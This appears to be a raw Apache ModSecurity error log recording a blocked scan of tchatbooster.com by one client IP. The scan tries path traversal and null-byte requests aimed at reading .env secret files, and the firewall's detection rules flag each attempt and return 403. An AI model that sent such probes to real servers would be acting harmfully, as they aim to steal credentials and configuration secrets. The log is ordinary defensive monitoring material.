[Tue May 12 04:39:36.527025 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.527256 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.527291 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.527721 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 26)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:36.561142 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6Due9Sp-pIv_Bb61aAAAAUQ"], referer: https://tchatbooster.com/css../../.env
[Tue May 12 04:39:36.589348 2026] [core:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 04:39:36.718996 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6M1tk6y7yBJLpJop3AAAAIU"]
[Tue May 12 04:39:36.738676 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS6Due9Sp-pIv_Bb61agAAAUQ"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:36.738927 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKS6Due9Sp-pIv_Bb61agAAAUQ"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:37.020314 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 26 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6M1tk6y7yBJLpJop3QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.044546 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6c1tk6y7yBJLpJop3gAAAIU"]
[Tue May 12 04:39:37.044591 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6c1tk6y7yBJLpJop3gAAAIU"]
[Tue May 12 04:39:37.044619 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6c1tk6y7yBJLpJop3gAAAIU"]
[Tue May 12 04:39:37.045216 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6c1tk6y7yBJLpJop3gAAAIU"]
[Tue May 12 04:39:37.075484 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6c1tk6y7yBJLpJop3wAAAII"], referer: https://tchatbooster.com/css../../../.env
[Tue May 12 04:39:37.075712 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6c1tk6y7yBJLpJop3wAAAII"], referer: https://tchatbooster.com/css../../../.env
[Tue May 12 04:39:37.229243 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6Due9Sp-pIv_Bb61agAAAUQ"], referer: https://tchatbooster.com/.env.dev
[Tue May 12 04:39:37.375013 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:30170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS6c1tk6y7yBJLpJop4AAAAIM"]
[Tue May 12 04:39:37.375232 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:30170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS6c1tk6y7yBJLpJop4AAAAIM"]
[Tue May 12 04:39:37.492322 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6c1tk6y7yBJLpJop3gAAAIU"]
[Tue May 12 04:39:37.519934 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.519977 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.520004 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.520029 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.520642 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 16)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:37.578851 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6c1tk6y7yBJLpJop3wAAAII"], referer: https://tchatbooster.com/css../../../.env
[Tue May 12 04:39:37.669136 2026] [core:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 04:39:37.902473 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:30170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6c1tk6y7yBJLpJop4AAAAIM"]
[Tue May 12 04:39:37.919992 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS6c1tk6y7yBJLpJop4gAAAII"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:37.920222 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKS6c1tk6y7yBJLpJop4gAAAII"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:38.002648 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 16 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6Tue9Sp-pIv_Bb61bAAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:38.030414 2026] [core:error] [pid 1820198:tid 1820203] [client 45.148.10.166:30170] AH10244: invalid URI path (/../../.env)
[Tue May 12 04:39:38.184398 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6jue9Sp-pIv_Bb61bwAAAUQ"], referer: https://tchatbooster.com/css../../../../.env
[Tue May 12 04:39:38.184725 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6jue9Sp-pIv_Bb61bwAAAUQ"], referer: https://tchatbooster.com/css../../../../.env
[Tue May 12 04:39:38.419262 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6c1tk6y7yBJLpJop4gAAAII"], referer: https://tchatbooster.com/.env.example
[Tue May 12 04:39:38.485236 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:30174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS6s1tk6y7yBJLpJop5AAAAJc"]
[Tue May 12 04:39:38.485452 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:30174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS6s1tk6y7yBJLpJop5AAAAJc"]
[Tue May 12 04:39:38.507166 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6s1tk6y7yBJLpJop5QAAAII"], referer: https://tchatbooster.com/../../.env
[Tue May 12 04:39:38.507377 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6s1tk6y7yBJLpJop5QAAAII"], referer: https://tchatbooster.com/../../.env
[Tue May 12 04:39:38.682881 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6jue9Sp-pIv_Bb61bwAAAUQ"], referer: https://tchatbooster.com/css../../../../.env
